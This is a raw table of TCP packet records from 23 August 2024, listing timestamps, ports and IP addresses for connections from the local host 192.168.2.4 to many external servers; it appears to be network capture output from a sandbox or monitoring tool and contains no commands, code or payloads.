Aug 23, 2024 18:47:01.170217037 CEST	80	49651	18.208.156.248	192.168.2.4
Aug 23, 2024 18:47:01.170300007 CEST	49651	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:47:01.170407057 CEST	49651	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:47:01.175338030 CEST	80	49651	18.208.156.248	192.168.2.4
Aug 23, 2024 18:47:01.237946033 CEST	49652	80	192.168.2.4	3.94.10.34
Aug 23, 2024 18:47:01.249221087 CEST	80	49652	3.94.10.34	192.168.2.4
Aug 23, 2024 18:47:01.253348112 CEST	49652	80	192.168.2.4	3.94.10.34
Aug 23, 2024 18:47:01.253634930 CEST	49652	80	192.168.2.4	3.94.10.34
Aug 23, 2024 18:47:01.262073040 CEST	80	49652	3.94.10.34	192.168.2.4
Aug 23, 2024 18:47:01.350383043 CEST	49653	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:01.356230974 CEST	80	49653	172.234.222.143	192.168.2.4
Aug 23, 2024 18:47:01.356312037 CEST	49653	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:01.356399059 CEST	49653	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:01.362689018 CEST	80	49653	172.234.222.143	192.168.2.4
Aug 23, 2024 18:47:01.471368074 CEST	80	49734	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:01.471458912 CEST	80	49733	208.100.26.245	192.168.2.4
Aug 23, 2024 18:47:01.471543074 CEST	49734	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:01.473287106 CEST	49733	80	192.168.2.4	208.100.26.245
Aug 23, 2024 18:47:01.480647087 CEST	49733	80	192.168.2.4	208.100.26.245
Aug 23, 2024 18:47:01.483238935 CEST	49734	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:01.486578941 CEST	80	49734	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:01.486644030 CEST	49734	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:01.487250090 CEST	80	49733	208.100.26.245	192.168.2.4
Aug 23, 2024 18:47:01.490963936 CEST	80	49734	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:01.518697977 CEST	80	60209	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:01.518762112 CEST	60209	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:01.518945932 CEST	80	49731	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:01.518997908 CEST	49731	80	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:01.520199060 CEST	80	60209	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:01.520251036 CEST	60209	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:01.520273924 CEST	60209	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:01.530188084 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:01.530220985 CEST	443	49654	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:01.530348063 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:01.530946016 CEST	80	60209	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:01.543596029 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:01.543611050 CEST	443	49654	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:01.589385986 CEST	80	49735	3.64.163.50	192.168.2.4
Aug 23, 2024 18:47:01.589447021 CEST	49735	80	192.168.2.4	3.64.163.50
Aug 23, 2024 18:47:01.590604067 CEST	49735	80	192.168.2.4	3.64.163.50
Aug 23, 2024 18:47:01.596534967 CEST	80	49735	3.64.163.50	192.168.2.4
Aug 23, 2024 18:47:01.607887983 CEST	80	49732	162.255.119.102	192.168.2.4
Aug 23, 2024 18:47:01.607947111 CEST	49732	80	192.168.2.4	162.255.119.102
Aug 23, 2024 18:47:01.618794918 CEST	80	49733	208.100.26.245	192.168.2.4
Aug 23, 2024 18:47:01.618856907 CEST	49733	80	192.168.2.4	208.100.26.245
Aug 23, 2024 18:47:01.623140097 CEST	49655	80	192.168.2.4	69.162.80.60
Aug 23, 2024 18:47:01.630845070 CEST	80	49655	69.162.80.60	192.168.2.4
Aug 23, 2024 18:47:01.630913973 CEST	49655	80	192.168.2.4	69.162.80.60
Aug 23, 2024 18:47:01.631045103 CEST	49655	80	192.168.2.4	69.162.80.60
Aug 23, 2024 18:47:01.637155056 CEST	80	49655	69.162.80.60	192.168.2.4
Aug 23, 2024 18:47:01.642194986 CEST	49656	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:01.647559881 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:01.647650957 CEST	49656	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:01.647768021 CEST	49656	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:01.654727936 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:01.728394985 CEST	80	49651	18.208.156.248	192.168.2.4
Aug 23, 2024 18:47:01.728463888 CEST	49651	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:47:01.729518890 CEST	49651	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:47:01.747668982 CEST	80	49651	18.208.156.248	192.168.2.4
Aug 23, 2024 18:47:01.747721910 CEST	49651	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:47:01.778620958 CEST	80	49735	3.64.163.50	192.168.2.4
Aug 23, 2024 18:47:01.778688908 CEST	49735	80	192.168.2.4	3.64.163.50
Aug 23, 2024 18:47:01.793153048 CEST	80	49652	3.94.10.34	192.168.2.4
Aug 23, 2024 18:47:01.793323040 CEST	49652	80	192.168.2.4	3.94.10.34
Aug 23, 2024 18:47:01.793757915 CEST	80	49652	3.94.10.34	192.168.2.4
Aug 23, 2024 18:47:01.793817997 CEST	49652	80	192.168.2.4	3.94.10.34
Aug 23, 2024 18:47:01.794491053 CEST	49652	80	192.168.2.4	3.94.10.34
Aug 23, 2024 18:47:01.803776026 CEST	80	49652	3.94.10.34	192.168.2.4
Aug 23, 2024 18:47:01.882685900 CEST	80	49653	172.234.222.143	192.168.2.4
Aug 23, 2024 18:47:01.882747889 CEST	49653	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:01.882869959 CEST	49653	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:01.890460014 CEST	49657	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:01.891274929 CEST	80	49653	172.234.222.143	192.168.2.4
Aug 23, 2024 18:47:01.898391008 CEST	80	49657	172.234.222.143	192.168.2.4
Aug 23, 2024 18:47:01.898458004 CEST	49657	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:01.898557901 CEST	49657	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:01.907430887 CEST	80	49657	172.234.222.143	192.168.2.4
Aug 23, 2024 18:47:01.956152916 CEST	49658	80	192.168.2.4	5.79.71.225
Aug 23, 2024 18:47:01.962145090 CEST	80	49658	5.79.71.225	192.168.2.4
Aug 23, 2024 18:47:01.962209940 CEST	49658	80	192.168.2.4	5.79.71.225
Aug 23, 2024 18:47:01.962342978 CEST	49658	80	192.168.2.4	5.79.71.225
Aug 23, 2024 18:47:01.968281984 CEST	80	49658	5.79.71.225	192.168.2.4
Aug 23, 2024 18:47:02.039536953 CEST	443	49654	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:02.039613962 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.071765900 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:02.071829081 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:02.118827105 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.118844986 CEST	443	49654	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:02.119187117 CEST	443	49654	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:02.119256020 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.126070976 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.172492981 CEST	443	49654	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:02.186418056 CEST	80	49655	69.162.80.60	192.168.2.4
Aug 23, 2024 18:47:02.186518908 CEST	49655	80	192.168.2.4	69.162.80.60
Aug 23, 2024 18:47:02.186646938 CEST	49655	80	192.168.2.4	69.162.80.60
Aug 23, 2024 18:47:02.191792965 CEST	80	49655	69.162.80.60	192.168.2.4
Aug 23, 2024 18:47:02.191854000 CEST	49655	80	192.168.2.4	69.162.80.60
Aug 23, 2024 18:47:02.194189072 CEST	80	49655	69.162.80.60	192.168.2.4
Aug 23, 2024 18:47:02.370780945 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.370944023 CEST	49656	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:02.371756077 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.371767044 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.371815920 CEST	49656	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:02.373781919 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.373792887 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.373873949 CEST	49656	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:02.377532005 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.377545118 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.377552986 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.377593994 CEST	49656	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:02.379880905 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.379894018 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.379945040 CEST	49656	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:02.382414103 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.382427931 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.382471085 CEST	49656	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:02.385087967 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.385101080 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.385183096 CEST	49656	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:02.439796925 CEST	49659	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:02.463038921 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:02.463133097 CEST	49659	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:02.463293076 CEST	49659	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:02.472635031 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:02.485260010 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.485402107 CEST	49656	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:02.485729933 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.485743999 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.485847950 CEST	49656	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:02.488063097 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.488076925 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.488136053 CEST	49656	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:02.493659019 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.493673086 CEST	80	49657	172.234.222.143	192.168.2.4
Aug 23, 2024 18:47:02.493681908 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.493737936 CEST	49657	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:02.493741989 CEST	49656	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:02.493762970 CEST	49656	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:02.493923903 CEST	49657	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:02.495369911 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.495383024 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.495393991 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.495404005 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.495441914 CEST	49656	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:02.495481968 CEST	49656	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:02.495608091 CEST	49656	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:02.504908085 CEST	80	49657	172.234.222.143	192.168.2.4
Aug 23, 2024 18:47:02.506489038 CEST	80	49656	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:02.737721920 CEST	443	49654	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:02.737787008 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.737801075 CEST	443	49654	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:02.737850904 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.739732027 CEST	443	49654	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:02.739927053 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.739936113 CEST	443	49654	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:02.739974976 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.742810011 CEST	443	49654	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:02.743877888 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.743885040 CEST	443	49654	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:02.743937969 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.745259047 CEST	443	49654	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:02.745395899 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.745403051 CEST	443	49654	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:02.745461941 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.748048067 CEST	443	49654	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:02.748102903 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.750513077 CEST	443	49654	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:02.750560045 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.750566006 CEST	443	49654	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:02.750608921 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.750614882 CEST	443	49654	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:02.750664949 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.760124922 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.760171890 CEST	443	49654	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:02.760199070 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.760215998 CEST	49654	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.889772892 CEST	49731	80	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:02.925688982 CEST	80	49731	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:03.169848919 CEST	49660	80	192.168.2.4	154.212.231.82
Aug 23, 2024 18:47:03.181528091 CEST	80	49660	154.212.231.82	192.168.2.4
Aug 23, 2024 18:47:03.185353041 CEST	49660	80	192.168.2.4	154.212.231.82
Aug 23, 2024 18:47:03.185971975 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.186605930 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.186616898 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.186677933 CEST	49659	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:03.188390017 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.188400030 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.188467026 CEST	49659	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:03.190713882 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.190726042 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.190788031 CEST	49659	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:03.193403959 CEST	49660	80	192.168.2.4	154.212.231.82
Aug 23, 2024 18:47:03.198024988 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.198038101 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.198049068 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.198127031 CEST	49659	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:03.198169947 CEST	49659	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:03.200207949 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.201350927 CEST	49659	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:03.202122927 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.202189922 CEST	49659	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:03.211750031 CEST	80	49660	154.212.231.82	192.168.2.4
Aug 23, 2024 18:47:03.284656048 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.285340071 CEST	49659	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:03.285497904 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.285507917 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.285551071 CEST	49659	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:03.285563946 CEST	49659	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:03.288173914 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.288184881 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.288279057 CEST	49659	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:03.290062904 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.290083885 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.290242910 CEST	49659	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:03.292179108 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.292190075 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.292243958 CEST	49659	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:03.292304039 CEST	49659	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:03.296256065 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.296336889 CEST	49659	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:03.342531919 CEST	49659	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:03.352816105 CEST	80	49659	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:03.985028982 CEST	80	49731	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:03.985126972 CEST	49731	80	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:03.990473032 CEST	49661	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:03.990526915 CEST	443	49661	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:03.990617990 CEST	49661	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:03.990859985 CEST	49661	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:03.990876913 CEST	443	49661	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:04.229182959 CEST	80	49660	154.212.231.82	192.168.2.4
Aug 23, 2024 18:47:04.229266882 CEST	49660	80	192.168.2.4	154.212.231.82
Aug 23, 2024 18:47:04.242908955 CEST	49660	80	192.168.2.4	154.212.231.82
Aug 23, 2024 18:47:04.248729944 CEST	80	49660	154.212.231.82	192.168.2.4
Aug 23, 2024 18:47:04.526654005 CEST	443	49661	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:04.526844978 CEST	49661	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:04.529423952 CEST	49661	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:04.529454947 CEST	443	49661	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:04.529676914 CEST	443	49661	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:04.529743910 CEST	49661	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:04.530178070 CEST	49661	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:04.572510004 CEST	443	49661	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:04.673296928 CEST	80	49660	154.212.231.82	192.168.2.4
Aug 23, 2024 18:47:04.673377037 CEST	49660	80	192.168.2.4	154.212.231.82
Aug 23, 2024 18:47:05.204358101 CEST	443	49661	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:05.204397917 CEST	443	49661	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:05.204459906 CEST	49661	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:05.204509974 CEST	443	49661	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:05.204533100 CEST	49661	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:05.204550028 CEST	49661	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:05.204879045 CEST	49661	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:05.204906940 CEST	49661	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:15.205637932 CEST	80	49658	5.79.71.225	192.168.2.4
Aug 23, 2024 18:47:15.205703974 CEST	49658	80	192.168.2.4	5.79.71.225
Aug 23, 2024 18:47:15.205900908 CEST	80	49658	5.79.71.225	192.168.2.4
Aug 23, 2024 18:47:15.205912113 CEST	80	49658	5.79.71.225	192.168.2.4
Aug 23, 2024 18:47:15.205965042 CEST	49658	80	192.168.2.4	5.79.71.225
Aug 23, 2024 18:47:15.206259966 CEST	80	49658	5.79.71.225	192.168.2.4
Aug 23, 2024 18:47:15.206309080 CEST	49658	80	192.168.2.4	5.79.71.225
Aug 23, 2024 18:47:15.206574917 CEST	49658	80	192.168.2.4	5.79.71.225
Aug 23, 2024 18:47:15.212281942 CEST	80	49658	5.79.71.225	192.168.2.4
Aug 23, 2024 18:47:15.358666897 CEST	49662	80	192.168.2.4	13.248.169.48
Aug 23, 2024 18:47:15.365753889 CEST	80	49662	13.248.169.48	192.168.2.4
Aug 23, 2024 18:47:15.365822077 CEST	49662	80	192.168.2.4	13.248.169.48
Aug 23, 2024 18:47:15.365961075 CEST	49662	80	192.168.2.4	13.248.169.48
Aug 23, 2024 18:47:15.373169899 CEST	80	49662	13.248.169.48	192.168.2.4
Aug 23, 2024 18:47:15.382708073 CEST	49663	80	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:15.388031960 CEST	80	49663	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:15.388195038 CEST	49663	80	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:15.388293028 CEST	49663	80	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:15.394251108 CEST	80	49663	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:16.111651897 CEST	51111	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:47:16.118444920 CEST	80	51111	18.208.156.248	192.168.2.4
Aug 23, 2024 18:47:16.118697882 CEST	51111	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:47:16.118697882 CEST	51111	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:47:16.127608061 CEST	80	51111	18.208.156.248	192.168.2.4
Aug 23, 2024 18:47:16.497750998 CEST	51112	80	192.168.2.4	103.150.11.230
Aug 23, 2024 18:47:16.503474951 CEST	80	51112	103.150.11.230	192.168.2.4
Aug 23, 2024 18:47:16.503968954 CEST	51112	80	192.168.2.4	103.150.11.230
Aug 23, 2024 18:47:16.504283905 CEST	51112	80	192.168.2.4	103.150.11.230
Aug 23, 2024 18:47:16.509737015 CEST	80	51112	103.150.11.230	192.168.2.4
Aug 23, 2024 18:47:16.610033989 CEST	80	49732	162.255.119.102	192.168.2.4
Aug 23, 2024 18:47:16.611368895 CEST	49732	80	192.168.2.4	162.255.119.102
Aug 23, 2024 18:47:16.684410095 CEST	80	51111	18.208.156.248	192.168.2.4
Aug 23, 2024 18:47:16.686067104 CEST	80	51111	18.208.156.248	192.168.2.4
Aug 23, 2024 18:47:16.686194897 CEST	51111	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:47:16.688123941 CEST	51111	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:47:16.695007086 CEST	80	51111	18.208.156.248	192.168.2.4
Aug 23, 2024 18:47:16.822725058 CEST	80	49663	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:16.822889090 CEST	49663	80	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:16.831515074 CEST	51114	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:16.831546068 CEST	443	51114	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:16.831842899 CEST	51114	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:16.832268000 CEST	51114	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:16.832279921 CEST	443	51114	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:17.320399046 CEST	443	51114	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:17.320487022 CEST	51114	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:17.324816942 CEST	51114	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:17.324831009 CEST	443	51114	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:17.325046062 CEST	443	51114	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:17.325104952 CEST	51114	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:17.325500011 CEST	51114	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:17.372505903 CEST	443	51114	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:17.469763041 CEST	80	51112	103.150.11.230	192.168.2.4
Aug 23, 2024 18:47:17.469876051 CEST	51112	80	192.168.2.4	103.150.11.230
Aug 23, 2024 18:47:17.473989010 CEST	51116	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:47:17.479275942 CEST	8001	51116	106.15.137.66	192.168.2.4
Aug 23, 2024 18:47:17.479342937 CEST	51116	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:47:17.479486942 CEST	51116	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:47:17.484817982 CEST	8001	51116	106.15.137.66	192.168.2.4
Aug 23, 2024 18:47:18.725167036 CEST	8001	51116	106.15.137.66	192.168.2.4
Aug 23, 2024 18:47:18.725183964 CEST	8001	51116	106.15.137.66	192.168.2.4
Aug 23, 2024 18:47:18.725193024 CEST	8001	51116	106.15.137.66	192.168.2.4
Aug 23, 2024 18:47:18.725231886 CEST	51116	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:47:18.725270033 CEST	51116	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:47:18.725373983 CEST	51116	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:47:18.725395918 CEST	51116	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:47:18.726305962 CEST	51112	80	192.168.2.4	103.150.11.230
Aug 23, 2024 18:47:19.028413057 CEST	51112	80	192.168.2.4	103.150.11.230
Aug 23, 2024 18:47:19.150254965 CEST	8001	51116	106.15.137.66	192.168.2.4
Aug 23, 2024 18:47:19.150320053 CEST	51116	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:47:19.152265072 CEST	8001	51116	106.15.137.66	192.168.2.4
Aug 23, 2024 18:47:19.152297020 CEST	80	51112	103.150.11.230	192.168.2.4
Aug 23, 2024 18:47:19.152313948 CEST	51116	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:47:19.152328968 CEST	80	51112	103.150.11.230	192.168.2.4
Aug 23, 2024 18:47:19.476067066 CEST	80	51112	103.150.11.230	192.168.2.4
Aug 23, 2024 18:47:19.476259947 CEST	51112	80	192.168.2.4	103.150.11.230
Aug 23, 2024 18:47:19.477967978 CEST	51119	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:47:19.486280918 CEST	8001	51119	106.15.137.66	192.168.2.4
Aug 23, 2024 18:47:19.486388922 CEST	51119	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:47:19.486538887 CEST	51119	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:47:19.493689060 CEST	8001	51119	106.15.137.66	192.168.2.4
Aug 23, 2024 18:47:19.729990005 CEST	443	51114	188.114.97.3	192.168.2.4
